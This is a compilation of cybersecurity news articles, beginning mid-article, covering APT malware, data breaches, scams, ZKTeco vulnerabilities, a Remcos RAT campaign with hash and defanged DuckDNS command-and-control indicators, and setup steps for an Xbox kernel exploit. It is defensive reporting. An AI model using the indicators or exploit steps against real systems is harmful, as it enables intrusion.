targeting of security controls demonstrates Velvet Ant’s operational maturity. However, the focus on legacy platforms ultimately assisted the hackers in evading detection. The researchers identified the placement of 4 additional malware programs on compromised F5 appliances:- VELVETSTING - This program was configured to connect to a remote server located in China to check for encoded commands on an hourly basis. Once commands were received, the program would execute them via a Unix shell.
- VELVETTAP - Malware seems to have been monitoring and capturing data from the F5 internal network interface.
- SAMRID - This software has been identified as a publicly available tunneling program that had previously been utilized by Chinese state-sponsored groups. While dormant during the researcher's investigation, it may have provided the attackers remote access.
- ESRDE - This backdoor works similarly to VELVETSTING, running commands delivered from an external server. It was also inactive at the time of analysis.
Organizations Systems Were Reinfected Upon Malware Removal
After an extensive incident response operation apparently eliminated the threat actor’s access, researchers detected a PlugX reinfection on clean hosts again a few days later. Further analysis found that the new version of PlugX lacked an external command and control server. Instead, the malware was configured to use an internal file server for command and control. This adaptation blended malicious traffic with normal internal communications, helping Velvet Ant operate undetected. While the attack was eventually contained, its sophistication and persistence highlight the challenges defenders face against advanced persistent threats (APTs). The researchers stated that they could not rule out the possibility of the campaign being a ‘false-flag’ operation by a different APT group. However, the PlugX malware has previously been associated with other China-linked APTs. The researchers have shared several recommendations as well as indicators of compromise (IOCs) on their blog. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Globe Life Discloses Breach Amid Accusations of Fraud and Shady Business Tactics
Globe Life Discloses Breach Amid Accusations of Fraud and Shady Business Tactics
Globe Life Breach Discovery and Containment
According to Globe Life's filing with the SEC, the company had conducted a security review on one of its web portals to discover potential vulnerabilities that may have affected its access permissions and user identity management. The investigation was prompted by a legal inquiry from a state insurance regulator on June 13, 2024. The review revealed that an unauthorized party may have accessed the company's web portal, compromising sensitive customer and policyholder data. The company stated that it had immediately revoked external access to the affected portal upon breach discovery. Globe Life said that at this stage, it believes the security issue is isolated to the one web portal. All other company systems remain fully operational. Globe Life added that it expected minimal impact to its business operations after the take down of the affected web portal. The company has activated its cybersecurity incident response plan and engaged external forensics experts to investigate the breach's scope. In its SEC filing, Globe Life disclosed that the investigation remains ongoing. The full impact and nature of the incident are unclear at the moment.Incident Comes After Scrutiny Over Business Tactics
The company said it has yet to determine if the breach qualifies as a reportable cybersecurity incident under the SEC's disclosure rules. The disclosure comes amidst increasing scrutiny and financial setbacks suffered by the company. The Texas-based insurer has faced allegations of fraudulent sales tactics and other business and workplace improprieties. The short sellers Fuzzy Panda Research and Viceroy Research had made these allegations public in April 2024. While the company has continued to deny these claims, its share price has dropped by 24% since the publication of the Fuzzy Panda report. The reports claimed that Globe Life and its biggest subsidiary, American Income Life (AIL), had engaged in insurance fraud, framing of policies for dead and fictitious individuals, withdrawal of consumer funds without approval, unfair dismissal, misleading sales tactics and illegal kickbacks. They also alleged that some of AIL's most profitable agents had faced accusations of kidnapping, assault and child grooming from defendants, witnesses and plaintiffs. It remains unclear if the state insurance regulator contact that led to the breach discovery is related to these allegations. Insurers like Globe Life are regulated at the state level rather than federal level. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- UK, US and Canada Accuse Russia of Plot to Interfere With Elections in Moldova
UK, US and Canada Accuse Russia of Plot to Interfere With Elections in Moldova
Kremlin Actors Seeking to Discredit Moldova's Leaders
According to a statement from the U.S. Embassy in Russia, Russian threat actors are aggressively distributing propaganda to “foment negative public perceptions” of President Sandu. This involves fabricating electoral irregularities while also aiming to incite protests if the incumbent president is re-elected. The plot dates back years, with the Kremlin providing support to fugitive Moldovan businessman Ilan Shor. Shor had previously been sentenced to 15 years in prison in connection with the disappearance of $1 billion from Moldovan banks in 2014. All three countries had issued sanctions on Shor for his connection to the incident. The statement singled out Russian state-television channel RT for providing several years of support to Shor. The UK, US and Canada claim they have already shared detailed evidence with Moldovan authorities to enable further investigation and disruption. They also state they will continue backing Moldova with a range of support measures as it deals with Russian interference and fallout from the Ukraine war.All Three Countries Announce Support at G7 Summit
The three nations expressed confidence in Moldova's ability to manage these threats linked to Russian interference. They have taken several measures to support Moldova's efforts, including:- The sharing of detailed information with Moldovan partners to investigate, thwart, and put a stop to the Kremlin's plans.
- Increasing accountability and punishment for individuals and entities involved in covertly financing political activities in Moldova through sanctions and potential further actions.
- Strongly supporting Moldova's democratic, economic, security, and anti-corruption reforms, as well as its deepening European integration.
Russia Is a Threat to Election Security: Researchers
An earlier report from Mandiant in April suggested that Russia presented the biggest threat to election security in the United States, United Kingdom and European Union. “Multiple Russian groups have targeted past elections in the U.S., France, and Ukraine, and these groups have continued to demonstrate the capability and intent to target elections both directly and indirectly,” the report stated. Experts also fear Russian attempts at spreading disinformation or influencing public opinion on non-election events such as the upcoming 2024 Summer Olympics in Paris. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Fraudsters Have Been Creating Websites Impersonating the Official Olympics Ticketing Website
Fraudsters Have Been Creating Websites Impersonating the Official Olympics Ticketing Website
Website Incorporates Official Paris 2024 Summer Olympic Games Branding
The 'paris24tickets[.]com' website appeared professional and legitimate at first glance. The site advertised itself as a “secondary marketplace for sports and live events tickets,” and was displayed as the second result among sponsored Google search results for 'paris 2024 tickets.' It allowed visitors to navigate through upcoming Olympic events, select event specific tickets, and enter payment information. Its polished design resembled that of trusted ticketing platforms, along with the official Olympics ticket purchase site. Proofpoint researchers warned that the website was entirely fraudulent despite its authentic look and feel. The site was likely collecting users’ financial and personal information rather than actually processing ticket orders. The researchers acted swiftly to suspend the misleading domain upon its discovery. [caption id="attachment_77366" align="alignnone" width="2800"] Impersonating domain 'paris24tickets[.]com' (Source: archive.org)[/caption] [caption id="attachment_77365" align="alignnone" width="2800"] Official Olympics Ticketing Site (Source: https://tickets.paris2024.org)[/caption] The researchers noticed that in some cases, the scammers even sent emails promising "discounts" on coveted tickets to victims. This tactic was likely done to lure unsuspecting individuals, who may have been desperate to secure tickets at lower costs. Victims who have provided their personal or financial information on the fraudulent website risk having their identities and money stolen. The scammers behind these websites may also collect important personal data, such as names, contact information, and credit card details, for sale or further malicious campaigns.French Gendarmerie Nationale Reported the Discovery of 338 Scam Sites
The 'paris24tickets[.]com' website represents just a tiny fraction of a much broader network of fraudulent Olympics domains. The French Gendarmerie Nationale had identified approximately 338 such websites since March 2023, and made subsequent efforts to shut them down; 51 of these sites were stated to have been closed while 140 of them were put on notice. The fraudsters behind these scams likely rely on sponsored search engine ads and targeted emails to drive traffic to impersonating websites. Offers of special deals and discounts are further lures to draw-in potential victims. [caption id="attachment_77367" align="alignnone" width="1000"] Source: Shutterstock[/caption] 200 French gendarmes had been mobilized as a distinct unit to monitor the internet and various different social networks for Olympics ticketing-related fraud and mass resales, under the direction of the Europol. These units work along with the DGCCRF (Directorate General for Consumer Affairs, Competition and Fraud Prevention) in France. Captain Etienne Lestrelin, director of operations at the unit, told France Info radio that social media such as Facebook, Leboncoin, Telegram and Instagram were often “the primary source of resale attempts.” He added, “This is an exchange from individual to individual. Except that the buyer does not know if the person really owns the tickets, since they are virtual tickets, not tickets paper. So people are selling you wind, we don't know what they're selling." Lestrelin advised that tickets sold at too low of a price can alert potential buyers: "You will never have a ticket below its original cost. The goal of people who were able to buy tickets in volume and with the intention of reselling them, it is to make a profit So it is an alert if you find a much cheaper ticket. The sentence to remember is that there is no. very good deals on the internet, it's not possible." He instructed that it was also not possible to own a ticket before the event begins and QR Codes are generated. Anyone who claims to be currently in possession of a ticket, or owns tickets that seem visually legitimate, is still a fraud. He warned buyers to be vigilant about buying such tickets outside of official sources because it can also be an offense. "You are associating yourself with the offense that the seller commits when he resells without going through the official website. This is a criminal offense," he stated. To validate purchases, buyers can cross-check provided references with the official Paris 2024 Summer Olympic Games application. Buyers who suspect that they may have been duped can report to a police station, a gendarmerie or the DGCCRF. Legitimate ticket purchases can be made through the official ticketing website or official sub-distributor network.- Cybersecurity News and Magazine
- Baw Baw Shire Residents Impacted By OracleCMS Breach That Hit Several Major Cities in Australia
Baw Baw Shire Residents Impacted By OracleCMS Breach That Hit Several Major Cities in Australia
Over 1,200 Baw Baw Shire Residents Affected
The exposed information includes customer contact details and call notes—dates from June 2014 to January 2016 when customers rang the council hotline during evenings, weekends and holidays. Calls made during the specified period had been automatically forwarded to OracleCMS call agents. It remains unclear precisely how the contractor failed to protect confidential constituent information or when the company first discovered the breach. Upon learning of the breach earlier this month, Baw Baw officials urgently contacted every affected resident—over 1,250 in total—through SMS messages and personal calls to vulnerable groups like the elderly. While the breach did not infiltrate Baw Baw's systems directly with the council's own systems, it represents a alarming security gap by a third-party vendor given access to constituents' sensitive information.OracleCMS Provider Implicated in Other Breaches
Authorities are currently investigating the incident, which may have also impacted other clients of the Australia-based company. OracleCMS provides outsourced contact center services for an array of local governments and organizations. OracleCMS had previously been implicated in a long list of data breaches affecting several different cities in Australia. According to some official press release statements, OracleCMS appeared to initially downplay the incident. An earlier release from Merri-bek City Council stated:OracleCMS informed Council in April that there had been a cyber security incident where identifiable information of customers had been compromised. Until last week we were informed that Council’s customer data was not involved. Council has now been informed that the OracleCMS data breach does include records of calls handled by OracleCMS on Council’s behalf. We take the privacy of our customers very seriously and we are taking urgent action to address this issue.The OracleCMS data breach also affected some businesses such as several entities belonging to Nissan in the Australia and New Zealand region, such as Nissan Financial Services Australia Pty Ltd, Nissan Motor Co. Pty Ltd, Nissan Financial Services, New Zealand Pty Ltd and Nissan New Zealand Ltd.
OracleCMS subsequently suffered a data breach, which it was alerted to on 15 April 2024. This separate incident resulted in certain data which was held by OracleCMS, including the summary information Nissan provided to OracleCMS, being compromised and published on the dark web.As cyberattacks surge, some have questioned whether outsourcing critical customer service channels renders individuals and businesses more vulnerable to data theft. The incident serves as reminder for governments and organizations to lock down vulnerabilities present in third-party vendors or tools while conducting regular security audits. Residents with concerns regarding the breach may contact Baw Baw Shire Council’s customer service line at +61 3 5624 2411. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
- Cybersecurity News and Magazine
- Canada’s Largest District School Board Investigates Ransomware Incident
Canada’s Largest District School Board Investigates Ransomware Incident
Toronto District School Board's Investigation Underway
The school board stated that the incident had affected its testing environment, which had been used to evaluate new technology and programs before being deployed on systems. The board's cybersecurity team had taken immediate action upon discovering the incident, securing systems and preserving data. The Toronto District School Board had notified details of the incident to the Toronto police and the Information and Privacy Commissioner of Ontario. [caption id="attachment_77136" align="alignnone" width="2800"] Source: www.tdsb.on.ca[/caption] In its letter of notification sent to parents and guardians, the Toronto District School Board stated that it had launched an investigation with the aid of third-party experts to fully assess the nature and scope of the incident. This includes potential compromise of its networks or breach of sensitive personal information. [caption id="attachment_77137" align="alignnone" width="1770"] Source: www.tdsb.on.ca[/caption] The letter added, "If it is determined that any personal information has been impacted, we will provide notice to all affected individuals. We understand that news of a cyber incident is concerning, but please know that we are doing everything possible to learn more about what occurred and address this situation.Impact Unknown; More Details Expected Soon
Despite the attack, the district school board's systems remained fully operational and functional. While only the school's testing environment had been affected, Humber College cybersecurity expert Francis Syms remained concerned over the incident, as personal information is sometimes used on test environments. He added that test environments are usually not secured by multifactor authentication, potentially making data easier to access. However, he admitted that he was not aware of the testing system being used, as he was not part of the investigation team. The Toronto District School Board did not clarify whether the testing environment or its data contained any personal information. Ryan Bird, a spokesperson from the school district board, disclosed to CityNews Toronto that the full extent of the breach was unknown, or if any personal data had been compromised in the attack, but further details would be revealed by the end of the day. The Cyber Express team has reached out to the Toronto District School Board for further details and investigation results, but no responses have been received as of yet. Toronto's cybersecurity defenders have observed an uptick in cyberattacks in recent years, from both financially-motivated hackers and 'hacktivists' disrupting public systems. Some attacks occur during sensitive times such as elections, global conflicts, or visits by foreign leaders. However, ransomware attacks remain the most common form of attacks. City officials have been working with several agencies to rebuild trust in the safety of public systems and services. Charles Finlay, Toronto resident and executive director at Rogers Cybersecure Catalyst, had earlier stated to the Toronto Star, “I think the city has to be more forthcoming about what it is doing to ensure that those services are secure from cyber-attacks.” The City had witnessed several attacks on its public institutions such a Cl0p ransomware intrusion into the City of Toronto's computer systems as well as an attack last year on the Toronto Public Library's computer systems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.CISA Warns of Phone Scammers Impersonating Its Employees
CISA Impersonation Scam
The spammers behind the campaign make phone calls to victims in which they claim to be contacting targets on behalf of CISA; they then ask victims to share personal information or money under the guise of protecting their accounts from unauthorized activity. Fraudsters may also direct victims to download additional software or click on links to "verify" their identity. However, CISA confirmed that it would never make such demands. "CISA staff will never contact you with a request to wire money, cash, cryptocurrency, or use gift cards and will never instruct you to keep the discussion secret," CISA warned. Possible red flags to watch out for:- Unsolicited phone calls that claim to be from CISA.
- Callers requesting personal information, such as passwords, social security numbers, or financial information.
- Callers demanding payment or transfer of money to "protect" your account.
- Callers creating a sense of urgency or pressuring you to take immediate action.
- Do not pay the caller.
- Take record of the numbers used.
- Hang up the phone immediately while ignoring further calls from suspicious numbers.
- Report the scam to CISA by calling (844) SAY-CISA (844-729-2472).
FTC Observes Uptick in Impersonation Scams
The CISA impersonation scam is a recent example of the rise in impersonation fraud targeting both businesses and government agencies. According to the latest data from the Federal Trade Commission (FTC), the number of such scams has increased dramatically in recent years, and cost consumers more than $1.1 billion in 2023 alone. The FTC report showed that in 2023, the agency received more than 330,000 reports of fraud posing as a business and almost 160,000 reports of fraud posing as a government. Collectively, these incidents account for almost half of all fraud cases reported directly to the FTC. "The financial injury is breath-taking – and cash-taking," the FTC quipped in its Spotlight. It further added, "Reported losses to impersonation scams topped $1.1 billion in 2023, more than three times what consumers reported in 2020." While fraudsters employ various types of scams, the FTC noted that the below types accounted for nearly half of the reported/observed scams in 2023:- Copycat account security alerts: Scams that pretend to impersonate legitimate services such as Amazon while purporting to be about unauthorized activity or charges to their account.
- Phony subscription renewals: Usually email notices that alert targets of auto-renew charges to various online services.
- Fake giveaways, discounts, or money to claim: Fake rewards or winnings that claim to originate from legitimate providers such as internet providers or large retailers.
- Bogus problems with the law: Scammers try to deceive targets into believing that their identity had been used to commit heinous crimes such as money laundering or the smuggling of drugs.
- Made-up package delivery problems: Messages that alert you of fake delivery problems with legitimate delivery services such as the U.S. Postal Service, UPS, or FedEx.
- Cybersecurity News and Magazine
- Researchers Discovered 24 Vulnerabilities in ZKTeco Biometric Terminals Used In Nuclear Plants
Researchers Discovered 24 Vulnerabilities in ZKTeco Biometric Terminals Used In Nuclear Plants
Vulnerabilities in ZKTeco Biometric Terminals
Biometric terminals see multiple uses aside from their primary purpose of acquiring biometric data such as fingerprints, voices, facial features, or irises. They can be connected to other scanners to support alternative authentication methods, or be deployed as a means of ensuring employee productivity or to reduce fraud. These devices see increasing usage in confidential facilities such as power plants, executive suites or server rooms. ZKTeco biometric terminals support facial recognition(with the ability to store thousands of face templates), password entry, electronic pass, and QR codes. Researchers conducted several tests to assess the security and reliability of these devices, finding 24 different vulnerabilities that may be exploited by threat actors in real attack scenarios on confidential facilities:- 6 SQL injection vulnerabilities
- 7 buffer stack overflow vulnerabilities
- 5 command injection vulnerabilities
- 4 arbitrary file write vulnerabilities
- 2 arbitrary file read vulnerabilities
- Physical Bypass via Fake QR Codes CVE-2023-3938 allows cybercriminals to perform a SQL injection attack by injecting malicious code into access strings. This could allow them to gain unauthorized entry to restricted areas.
- Biometric Data Theft and Backdoor Deployment The CVE-2023-3940 and CVE-2023-3942 vulnerabilities could give attackers access to sensitive user data and password hashes stored on the device. Additionally, CVE-2023-3941 could allow them to remotely alter device databases, allowing them to potentially add unauthorized individuals into systems or create a backdoor.
- Remote Code Execution The CVE-2023-3939 and CVE-2023-3943 flaws enable the execution of arbitrary commands or code on the device, effectively giving attackers full control and the ability to launch further attacks on the wider network.
“The impact of the discovered vulnerabilities is alarmingly diverse. To begin with, attackers can sell stolen biometric data on the dark web, subjecting affected individuals to increased risks of deepfake and sophisticated social engineering attacks. Furthermore, the ability to alter the database weaponizes the original purpose of the access control devices, potentially granting access to restricted areas for nefarious actors. Lastly, some vulnerabilities enable the placement of a backdoor to covertly infiltrate other enterprise networks, facilitating the development of sophisticated attacks, including cyberespionage or sabotage. All these factors underscore the urgency of patching these vulnerabilities and thoroughly auditing the device's security settings for those using the devices in corporate areas.”
Mitigating Risks to Biometric Terminals
The researchers stated that they had disclosed all information about the discovered vulnerabilities to ZKTeco, but lacked accessible data on whether these vulnerabilities had been patched. The researchers have shared the following recommendations to protect these biometric terminals from attacks in the meanwhile:- Isolate biometric reader usage into a separate network segment.
- Employ robust administrator passwords and change default ones.
- Audit and fortify the device's security settings, including enabling temperature detection.
- If feasible, minimize the use of QR code functionality.
- Regularly update the device's firmware.
- Cybersecurity News and Magazine
- City of Moreton Bay Investigates Data Breach After Resident Discovered Leak of Private Information
City of Moreton Bay Investigates Data Breach After Resident Discovered Leak of Private Information
Data Breach Discovered By Local Resident
City of Moreton Bay resident Piper Lalonde, who works as a data analyst, had discovered the breach along with her husband. They were shocked to learn that their personal information was freely available on the council's customer request online portal. The couple had discovered that the information included their phone numbers, complaints, and requests that they had made for new bins, along with the GPS coordinates of where the requests had been filed. A further investigation into the breach had revealed that the personal information of some of their friends and neighbors who were fellow ratepayers were also available in the records after they conducted a search. Piper reported this information to the council, with the website being taken down the next day. However, she was still unsatisfied with the lack of notification about the incident to impacted residents. Piper stated, "I would expect they'd have to send out some formal communication letting people know their information was publicly accessible, but there was no indication they were going to do that." She expressed concern about the possibility of people stumbling upon complaints made about them by other residents. She added, "If this gets in the wrong hands — it just takes one person to see a complaint about them, and who knows what they'll do."City of Moreton Bay Responses to Data Breach
After Piper's report, the website was said to be taken down. The site appears to be functional as of now, with some functions still limited. The website includes an official notice in response to the incident. [caption id="attachment_76878" align="alignnone" width="2204"] Source: moretonbay.qld.gov.au[/caption]We are experiencing system difficulties with our customer request portal. Our third-party provider is investigating a possible information breach. The cause is yet to be determined but there is no indication this is a cyber attack. We will never contact you via unsolicited calls to request sensitive information. No action is required from you at this stage. We will continue to keep you informed.The notice appears to indicate that the breach stemmed from a third-party provider. The Cyber Express team has reached out to the Moreton Bay Council's Privacy Officer for further information on the breach, however no response has been received as of publication time. The potential scale of the data breach, as well as its impact on residents, is currently unknown. It is also unclear on how many individuals may have accessed the available data before the website had been temporarily taken down and subsequently limited. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
- Cybersecurity News and Magazine
- Apple Launches ‘Private Cloud Compute’ Along with Apple Intelligence AI
Apple Launches ‘Private Cloud Compute’ Along with Apple Intelligence AI
Private Cloud Compute Aims to Secure Cloud AI Processing
Apple has stated that its new Private Cloud Compute (PCC) is designed to enforce privacy and security standards over AI processing of private information. For the first time ever, Private Cloud Compute brings the same level of security and privacy that our users expect from their Apple devices to the cloud," said an Apple spokesperson. [caption id="attachment_76690" align="alignnone" width="1492"] Source: security.apple.com[/caption] At the heart of PCC is Apple's stated commitment to on-device processing. When Apple is responsible for user data in the cloud, we protect it with state-of-the-art security in our services," the spokesperson explained. "But for the most sensitive data, we believe end-to-end encryption is our most powerful defense." Despite this commitment, Apple has stated that for more sophisticated AI requests, Apple Intelligence needs to leverage larger, more complex models in the cloud. This presented a challenge to the company, as traditional cloud AI security models were found lacking in meeting privacy expectations. Apple stated that PCC is designed with several key features to ensure the security and privacy of user data, claiming the following implementations:- Stateless computation: PCC processes user data only for the purpose of fulfilling the user's request, and then erases the data.
- Enforceable guarantees: PCC is designed to provide technical enforcement for the privacy of user data during processing.
- No privileged access: PCC does not allow Apple or any third party to access user data without the user's consent.
- Non-targetability: PCC is designed to prevent targeted attacks on specific users.
- Verifiable transparency: PCC provides transparency and accountability, allowing users to verify that their data is being processed securely and privately.
Apple Invites Experts to Test Standards; Online Reactions Mixed
At this week's Apple Annual Developer Conference, Apple's CEO Tim Cook described Apple Intelligence as a "personal intelligence system" that could understand and contextualize personal data to deliver results that are "incredibly useful and relevant," making "devices even more useful and delightful." Apple Intelligence mines and processes data across apps, software and services across Apple devices. This mined data includes emails, images, messages, texts, messages, documents, audio files, videos, contacts, calendars, Siri conversations, online preferences and past search history. The new PCC system attempts to ease consumer privacy and safety concerns. In its description of 'Verifiable transparency,' Apple stated:"Security researchers need to be able to verify, with a high degree of confidence, that our privacy and security guarantees for Private Cloud Compute match our public promises. We already have an earlier requirement for our guarantees to be enforceable. Hypothetically, then, if security researchers had sufficient access to the system, they would be able to verify the guarantees."However, despite Apple's assurances, the announcement of Apple Intelligence drew mixed reactions online, with some already likening it to Microsoft's Recall. In reaction to Apple's announcement, Elon Musk took to X to announce that Apple devices may be banned from his companies, citing the integration of OpenAI as an 'unacceptable security violation.' Others have also raised questions about the information that might be sent to OpenAI. [caption id="attachment_76692" align="alignnone" width="596"] Source: X.com[/caption] [caption id="attachment_76693" align="alignnone" width="418"] Source: X.com[/caption] [caption id="attachment_76695" align="alignnone" width="462"] Source: X.com[/caption] According to Apple's statements, requests made on its devices are not stored by OpenAI, and users’ IP addresses are obscured. Apple stated that it would also add “support for other AI models in the future.” Andy Wu, an associate professor at Harvard Business School, who researches the usage of AI by tech companies, highlighted the challenges of running powerful generative AI models while limiting their tendency to fabricate information. “Deploying the technology today requires incurring those risks, and doing so would be at odds with Apple’s traditional inclination toward offering polished products that it has full control over.” Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
- Cybersecurity News and Magazine
- South Korean Researchers Observe Remcos RAT Distributed Through Fake Shipping Lures
South Korean Researchers Observe Remcos RAT Distributed Through Fake Shipping Lures
Use of UUEncoding (UUE) Files to Distribute Remcos RAT Malware
Researchers from AhnLab discovered that the threat actors behind the campaign, use UUEncoding files with a .UUE extension, which are designed to encode binary data in plain text format. These file formats are suitable for attachment in e-mail or Usenet messages. The malicious .UUE files encode a VBS script attached in phishing emails. The threat actors seem to have leveraged the file format and encoding technique as an attempt to bypass detection. [caption id="attachment_76665" align="alignnone" width="1024"] Source: asec.ahnlab.com[/caption] When decoded, the VBS script is obfuscated, making it difficult for researchers to analyze. The script saves a PowerShell script into the %Temp% directory and executes it. The running script then downloads the Haartoppens.Eft file, which executes an additional PowerShell script. This script is also obfuscated and is designed to load a shellcode to the wab.exe process. [caption id="attachment_76666" align="alignnone" width="638"] Source: asec.ahnlab.com[/caption] The shellcode maintains its persistence by adding a registry key to the infected system, and then accesses a remote C&C server to load additional instructions. The instructions ultimately download the Remcos RAT malware for execution on infected systems.Remcos RAT malware
The Remcos RAT collects system information from infected systems and stores keylogging data in the %AppData% directory. The malware then sends this data to the remote command-and-control (C&C) server, which is hosted through a DuckDNS domain. [caption id="attachment_76667" align="alignnone" width="894"] Source: asec.ahnlab.com[/caption] Remcos is a commercial remote access tool (RAT) that is advertised as a legitimate tool, but has been observed in numerous threat actor campaigns. Successful loading of Remcos opens a backdoor on targeted systems, allowing for complete control. The researchers have shared the following indicators to help detect and stop this campaign: IOCs (Indicators of Compromise)- b066e5f4a0f2809924becfffa62ddd3b (Invoice_order_new.uue)
- 7e6ca4b3c4d1158f5e92f55fa9742601 (Invoice_order_new.vbs)
- fd14369743f0ccd3feaacca94d29a2b1 (Talehmmedes.txt)
- eaec85388bfaa2cffbfeae5a497124f0 (mtzDpHLetMLypaaA173.bin)
- Downloader/VBS.Agent (2024.05.17.01)
- Data/BIN.Encoded (2024.05.24.00)
- frabyst44habvous1.duckdns[.]org:2980:0
- frabyst44habvous1.duckdns[.]org:2981:1
- frabyst44habvous2.duckdns[.]org:2980:0
- Refrain from accessing emails from unknown sources.
- Refrain from running or enabling macro commands when accessing downloaded attachment files. Users can set programs to highest levels of security, as lower levels may automatically execute macro commands without displaying any notification.
- Update anti-malware engines to their latest versions.
- Cybersecurity News and Magazine
- BreachForums Down, Official Telegram Channels Deleted and Database Potentially Leaked
BreachForums Down, Official Telegram Channels Deleted and Database Potentially Leaked
BreachForums Down with '502- Bad Gateway' Error
BreachForums had earlier faced an official domain seizure by the FBI in a coordinated effort with various law enforcement agencies. However, shortly after, 'ShinyHunters' managed to recover the seized domains, with allegedly leaked FBI communications revealing they had lost control over the domain while the BreachForums staff claimed that it had been transferred to a different host. However, the site appears to be down again, but with no seizure notice present, leading to speculation over what has struck the site as well as its admin ShinyHunters. On X and LinkedIn, security researcher Vinny Troia claimed that ShinyHunters had made a direct message through Telegram indicating that he was retiring from the forums, as it was 'too much heat' and has shut it down. [caption id="attachment_76597" align="alignnone" width="1164"] Source: X.com[/caption] Both the researcher's X and LinkedIn post attribute this incident to the FBI 'nabbing' ShinyHunters, even congratulating the agency.BreachForums Telegram Channels Deleted
Shortly after the official domains went down, several official Telegram accounts that were associated with Breach Forums, including the main announcement channel and the Jacuzzi 2.0 account, were deleted. Forum moderator Aegis stated in a PGP signed message that Shiny Hunters had been banned from Telegram. [caption id="attachment_76580" align="alignnone" width="349"] Source: Telegram[/caption] [caption id="attachment_76582" align="alignnone" width="525"] Source: Telegram[/caption] In a new 'Jacuzzi' Telegram channel created shortly afterwards, a pinned message appears to confirm that the administrator ShinyHunters had quit after wishing to no longer maintain the forum. The message affirms that Shiny had not been arrested, but rather quit, while the forum has not been officially seized but taken down. [caption id="attachment_76604" align="alignnone" width="799"] Source: Telegram[/caption] A while later, a database allegedly containing data from the 'breachforums.is' domain (the previous official domain associated with BreachForums before it shifted to the .st domain) had been circulating among Telegram data leak and sharing channels. Another threat actor stated that the circulating leaks were likely an attempt to gain attention and subscribers in light of recent events, stating that the info is unverified and password-protected. [caption id="attachment_76578" align="alignnone" width="670"] Source: Telegram[/caption] Several threat actors had attempted to use these disruptions to promote their own alternatives such as Secretforums and Breach Nation. However, the administrator Astounded, who owned Secretforums, had himself announced his retirement from involvement from forum activity recently. [caption id="attachment_76590" align="alignnone" width="388"] Source: Telegram[/caption] The threat actor USDoD still appears to be promoting their Breach Nation as an alternative to BreachForums, even appreciating the move as a take down of 'competitors.' [caption id="attachment_76593" align="alignnone" width="1150"] Source: X.com[/caption] These incidents, along with ShinyHunter's disappearance, the deletion/unavailability of official channels as well as the arrests and disruptions associated with the forums, raise uncertainty over the community's future prospects as well as larger implications for data leak sharing. This article will be updated as we gather more information on events surrounding BreachForums. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Modder Discovered Kernel-Level Exploit in Xbox One Consoles
'Game Script' Xbox Console Kernel-Level Exploit
carrot_c4k3, the individual behind the discovery, disclosed on X that the exploit, which is not a jailbreak, works against the System OS software that exists on newer Xbox consoles such as the Xbox One. System OS exists to enable developers to run a wide variety of applications on these consoles through the use of virtualization technology. Applications downloaded from the Microsoft Store run on this layer. Xbox users can typically gain access to this environment by enabling developer mode on their consoles. However, carrot_c4k3 stated that while the exploit allows full control over vm homebrews on retail Xbox, it did not enable the use of pirated software upon usage. The method currently relies on the Game Script UWA application available on the Microsoft Store, which allows users to run and execute custom languages on the devices. The exploit consists of two components:- User mode: Initial steps where the user gains native code execution in the context of UWP (Microsoft Store) applications.
- Kernel exploit: In this step the user exploits a Kernel vulnerability on these devices to gain full read/write permissions, which would then enable them to elevate the privileges of a particular running process.
Exploit Might Have Been Patched In Newer Xbox Firmware Versions
A set of steps to be performed for the hack was shared on the Xbox One Research Github page:The page states that the exploit is "likely to be patched soon (in next System Update)." A thread on GBAtemp.net, a forum for discussing various video game platforms, stated that the latest firmware update for the Xbox One console has reportedly already patched the exploit, making the firmware 10.0.25398.4478 the last exploitable version. While the full consequences of this exploit and the one that will be shared are unknown, it highlights the interest that console players have in bypassing manufacturer-intended device limits. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
- Ensure your Xbox Live account Login-Type is configured as “No barriers” aka. auto-login with no password prompt
- Set your console as “Home Console” for this account
- Download the App Game Script
- Start the app (to ensure license is downloaded/cached)
- Take your console offline! To make extra sure it cannot reach the internet, set a manual primary DNS address of 127.0.0.1
- Get a device/microcontroller that can simulate a Keyboard (rubber ducky or similar) - otherwise you have to type a lot manually :D
- Cybersecurity News and Magazine
- Microsoft and Google Announce Plans to Help Rural U.S. Hospitals Defend Against Cyberattacks
Microsoft and Google Announce Plans to Help Rural U.S. Hospitals Defend Against Cyberattacks
Microsoft and Google Cybersecurity Plans for Rural Hospitals
Microsoft has launched a full-fledged cybersecurity program to meet the needs of rural hospitals, which are often more vulnerable to cyberattacks due to more limited IT security resources, staff and training than their urban peers. The program will deliver free and low-cost technology services, including:- Nonprofit pricing and discounts of up to 75% on Microsoft's security products for independent Critical Access Hospitals and Rural Emergency Hospitals.
- Larger rural hospitals already equipped with eligible Microsoft solutions will receive free advanced security suites for free.
- Free Windows 10 security updates for participating rural hospitals for at least one year.
- Cybersecurity assessments and training are being made free to hospital employees to help them better manage system security.
